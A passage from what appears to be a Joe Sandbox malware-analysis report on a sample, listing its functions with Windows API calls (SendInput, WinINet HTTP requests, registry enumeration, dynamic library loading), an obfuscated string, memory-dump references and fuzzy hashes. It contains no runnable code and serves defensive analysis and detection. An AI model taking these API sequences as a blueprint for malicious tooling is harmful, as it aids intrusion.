                                              • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00BB0C66
                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 00BB0C82
                                              • PostMessageW.USER32(00000000,00000101,00000000), ref: 00BB0CE1
                                              • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00BB0D33
                                              Strings
                                              • dowp0dowp4dowp2dowp4dowp0dowp5dowpcdowpbdowp2dowpbdowp6dowp5dowpfdowpcdowpfdowpfdowp7dowp5dowpddowp8dowp5dowp9dowpfdowpfdowp7dowp5, xrefs: 00BB0C9F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: KeyboardState$InputMessagePostSend
                                              • String ID: dowp0dowp4dowp2dowp4dowp0dowp5dowpcdowpbdowp2dowpbdowp6dowp5dowpfdowpcdowpfdowpfdowp7dowp5dowpddowp8dowp5dowp9dowpfdowpfdowp7dowp5
                                              • API String ID: 432972143-3861665079
                                              • Opcode ID: 1288ab0ba291cbce82373cea05a582886ac141b6ee44f6697c2fc0087a9f08ec
                                              • Instruction ID: 832100f5e7d7f930f71154d310cc0199997c4eeb5d8abadb01d496cd5de36c72
                                              • Opcode Fuzzy Hash: 1288ab0ba291cbce82373cea05a582886ac141b6ee44f6697c2fc0087a9f08ec
                                              • Instruction Fuzzy Hash: 513146309642086FFF30AA658814BFFBFE6EB45320F0443ABE881521D1D7B599558751
                                              Function 00BCD7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                              Download Yara Rule
                                              APIs
                                              • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00BCD7C5
                                                • Part of subcall function 00B5784B: _memmove.LIBCMT ref: 00B57899
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: BuffCharLower_memmove
                                              • String ID: cdecl$none$stdcall$winapi
                                              • API String ID: 3425801089-567219261
                                              • Opcode ID: 1af40037b8fc7a5b70512e058ff3ce4bdfe89f1db6f561ea14dbf5ce5506c128
                                              • Instruction ID: 1209f61f1aeef86fa9b874192a678fc8fa7c7f5e7e75e55c3df83074adaf7339
                                              • Opcode Fuzzy Hash: 1af40037b8fc7a5b70512e058ff3ce4bdfe89f1db6f561ea14dbf5ce5506c128
                                              • Instruction Fuzzy Hash: 37319075A04619AFCF00EF54CC51EAEB3F5FF14720B1086AAE825976D1DB31A905CB80
                                              Function 00BA8E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                • Part of subcall function 00BAAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00BAAABC
                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00BA8F14
                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00BA8F27
                                              • SendMessageW.USER32(?,00000189,?,00000000), ref: 00BA8F57
                                                • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessageSend$_memmove$ClassName
                                              • String ID: ComboBox$ListBox
                                              • API String ID: 365058703-1403004172
                                              • Opcode ID: 1ab1cd22bd91de0764f5d8488685d0a3ab6059e96d26fc20fe5d444092c38c59
                                              • Instruction ID: af8f9b5f362586127d920dbf8581cebd56de332e8ec3281d8c46f5f3884b576c
                                              • Opcode Fuzzy Hash: 1ab1cd22bd91de0764f5d8488685d0a3ab6059e96d26fc20fe5d444092c38c59
                                              • Instruction Fuzzy Hash: E921F571A08105BEDB14ABB0DC95DFEB7F9DF06320F0485AAF825571E0DF3A4809D620
                                              Function 00BC182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00BC184C
                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00BC1872
                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00BC18A2
                                              • InternetCloseHandle.WININET(00000000), ref: 00BC18E9
                                                • Part of subcall function 00BC2483: GetLastError.KERNEL32(?,?,00BC1817,00000000,00000000,00000001), ref: 00BC2498
                                                • Part of subcall function 00BC2483: SetEvent.KERNEL32(?,?,00BC1817,00000000,00000000,00000001), ref: 00BC24AD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                              • String ID:
                                              • API String ID: 3113390036-3916222277
                                              • Opcode ID: c5393edbfca1024514f6a4ec7ce4e8fbd9663c87d8c4d1e35fdfe474647f2a8e
                                              • Instruction ID: 241ad89fb8f05e0850a344ac31c1f99b09c7253521ad94824f7122e9ca64a3b1
                                              • Opcode Fuzzy Hash: c5393edbfca1024514f6a4ec7ce4e8fbd9663c87d8c4d1e35fdfe474647f2a8e
                                              • Instruction Fuzzy Hash: 3B21BEB1508209BFEB11AB68CC85FBB77EDEB49744F10456EF906A7241EB208D0597B0
                                              Function 00BD63E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B51D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00B51D73
                                                • Part of subcall function 00B51D35: GetStockObject.GDI32(00000011), ref: 00B51D87
                                                • Part of subcall function 00B51D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00B51D91
                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00BD6461
                                              • LoadLibraryW.KERNEL32(?), ref: 00BD6468
                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00BD647D
                                              • DestroyWindow.USER32(?), ref: 00BD6485
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                              • String ID: SysAnimate32
                                              • API String ID: 4146253029-1011021900
                                              • Opcode ID: 7bd4f44632b74005eacbb51e0bb6a7abfaa6108c53e439e3506be2fe1659e95a
                                              • Instruction ID: 29c40d73d9da27f96f33938ba8f1a609f85ef3d209e316afab08b738295d2dc4
                                              • Opcode Fuzzy Hash: 7bd4f44632b74005eacbb51e0bb6a7abfaa6108c53e439e3506be2fe1659e95a
                                              • Instruction Fuzzy Hash: 7F215B71200205AFEF108F64DC91EBBB7E9EB59368F10866AFA5093390EB71DC519B60
                                              Function 00BB6D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetStdHandle.KERNEL32(0000000C), ref: 00BB6DBC
                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00BB6DEF
                                              • GetStdHandle.KERNEL32(0000000C), ref: 00BB6E01
                                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00BB6E3B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CreateHandle$FilePipe
                                              • String ID: nul
                                              • API String ID: 4209266947-2873401336
                                              • Opcode ID: f4274e01a57529327977d6d8a07e6cba1bf1a0f6b8be5c7141892a3bc861ebab
                                              • Instruction ID: f36396093677caeabfa429cf8a194711374b5b90543468cb8efc912f61174b1a
                                              • Opcode Fuzzy Hash: f4274e01a57529327977d6d8a07e6cba1bf1a0f6b8be5c7141892a3bc861ebab
                                              • Instruction Fuzzy Hash: 9821837460020AABDB209F29DC44AF9BBE4EF44720F204A69FCA1D72D0EBB4DD50CB50
                                              Function 00BB6E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetStdHandle.KERNEL32(000000F6), ref: 00BB6E89
                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00BB6EBB
                                              • GetStdHandle.KERNEL32(000000F6), ref: 00BB6ECC
                                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00BB6F06
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CreateHandle$FilePipe
                                              • String ID: nul
                                              • API String ID: 4209266947-2873401336
                                              • Opcode ID: 5fe2ecd8d4ce92411b8543b5851e921d9145028d129131959d7eef20dd4b8e8a
                                              • Instruction ID: a9f29f380e78b85402e79fa229611ef02716904f37e950940b41bbd360de12b4
                                              • Opcode Fuzzy Hash: 5fe2ecd8d4ce92411b8543b5851e921d9145028d129131959d7eef20dd4b8e8a
                                              • Instruction Fuzzy Hash: DB2192755003069BDB209F69DC44AFAB7E8EF45720F200A59F9A1D72D0EBB4EC50CB50
                                              Function 00BBAC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 00BBAC54
                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00BBACA8
                                              • __swprintf.LIBCMT ref: 00BBACC1
                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,00BDF910), ref: 00BBACFF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: ErrorMode$InformationVolume__swprintf
                                              • String ID: %lu
                                              • API String ID: 3164766367-685833217
                                              • Opcode ID: 0aa3912d246f53dd5615eb86e629f5a0191a06d5d743e51701ede60d2c0ae53d
                                              • Instruction ID: e077656c7554d7e48ecaa0b1fbcf18932779a22748b1594c79dd29201348ccba
                                              • Opcode Fuzzy Hash: 0aa3912d246f53dd5615eb86e629f5a0191a06d5d743e51701ede60d2c0ae53d
                                              • Instruction Fuzzy Hash: 22217170A00109EFCB10DF64CD85EEEBBF8EF49715B0040E9F909AB261DA71EA45CB21
                                              Function 00BB1AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                              Download Yara Rule
                                              APIs
                                              • CharUpperBuffW.USER32(?,?), ref: 00BB1B19
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: BuffCharUpper
                                              • String ID: APPEND$EXISTS$KEYS$REMOVE
                                              • API String ID: 3964851224-769500911
                                              • Opcode ID: 33fe4d1fbdcb6689bca0d9a0358116349a6025c8d4ec6b339509fad44f0a740a
                                              • Instruction ID: 62705b149c8d524d7f3e1972a5cb798f64ab68b785e72021af22a9cc65b57549
                                              • Opcode Fuzzy Hash: 33fe4d1fbdcb6689bca0d9a0358116349a6025c8d4ec6b339509fad44f0a740a
                                              • Instruction Fuzzy Hash: 7F113C709102099FCF10EF98D8629FEB7F4FF25704F5088E5D86567695EB32990ACB50
                                              Function 00BCEB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00BCEC07
                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00BCEC37
                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00BCED6A
                                              • CloseHandle.KERNEL32(?), ref: 00BCEDEB
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                              • String ID:
                                              • API String ID: 2364364464-0
                                              • Opcode ID: fc4e78a609f2ccaa543551182b7d9b94a8860e388a4554518a12aa440f5f4516
                                              • Instruction ID: 51b2b4f1a95f94c2c1215edcb9abc5d0269b6c3fb8ed0d567ab3b890472004a3
                                              • Opcode Fuzzy Hash: fc4e78a609f2ccaa543551182b7d9b94a8860e388a4554518a12aa440f5f4516
                                              • Instruction Fuzzy Hash: 29815F716047019FD720EF28C886F2AB7E5AF44750F1488ADF96ADB2D2DBB0ED448B51
                                              Function 00BD0037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B57DE1: _memmove.LIBCMT ref: 00B57E22
                                                • Part of subcall function 00BD0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BCFDAD,?,?), ref: 00BD0E31
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BD00FD
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BD013C
                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00BD0183
                                              • RegCloseKey.ADVAPI32(?,?), ref: 00BD01AF
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00BD01BC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                              • String ID:
                                              • API String ID: 3440857362-0
                                              • Opcode ID: c216ac56a39e07f9a126923b1f6a177c58247170ab9cdd6a0ac3b5b2a60585a7
                                              • Instruction ID: 266d85fa75bb4f09f2f382e473766fdd2c573288a45c68372f14d48820ef6cbe
                                              • Opcode Fuzzy Hash: c216ac56a39e07f9a126923b1f6a177c58247170ab9cdd6a0ac3b5b2a60585a7
                                              • Instruction Fuzzy Hash: 42518F71218204AFC714EF64CC91F6AB7E9FF84304F4449AEF955972A1EB31E909CB52
                                              Function 00BCD8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
                                                • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
                                              • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00BCD927
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00BCD9AA
                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00BCD9C6
                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00BCDA07
                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00BCDA21
                                                • Part of subcall function 00B55A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00BB7896,?,?,00000000), ref: 00B55A2C
                                                • Part of subcall function 00B55A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00BB7896,?,?,00000000,?,?), ref: 00B55A50
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                              • String ID:
                                              • API String ID: 327935632-0
                                              • Opcode ID: 29ad0d0cade7176c8e594abd185ca7d51594a62c1ceabcd6ac06a9e29e336e24
                                              • Instruction ID: b35dcd2790b90e576e24c887e1d70285aeecce45ba40f21efc01c42e733da825
                                              • Opcode Fuzzy Hash: 29ad0d0cade7176c8e594abd185ca7d51594a62c1ceabcd6ac06a9e29e336e24
                                              • Instruction Fuzzy Hash: 20510979A04209DFCB10EFA8C494EADB7F5EF09311B1480A9E956AB312DB31ED45CB51
                                              Function 00BBE571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00BBE61F
                                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00BBE648
                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00BBE687
                                                • Part of subcall function 00B59837: __itow.LIBCMT ref: 00B59862
                                                • Part of subcall function 00B59837: __swprintf.LIBCMT ref: 00B598AC
                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00BBE6AC
                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00BBE6B4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
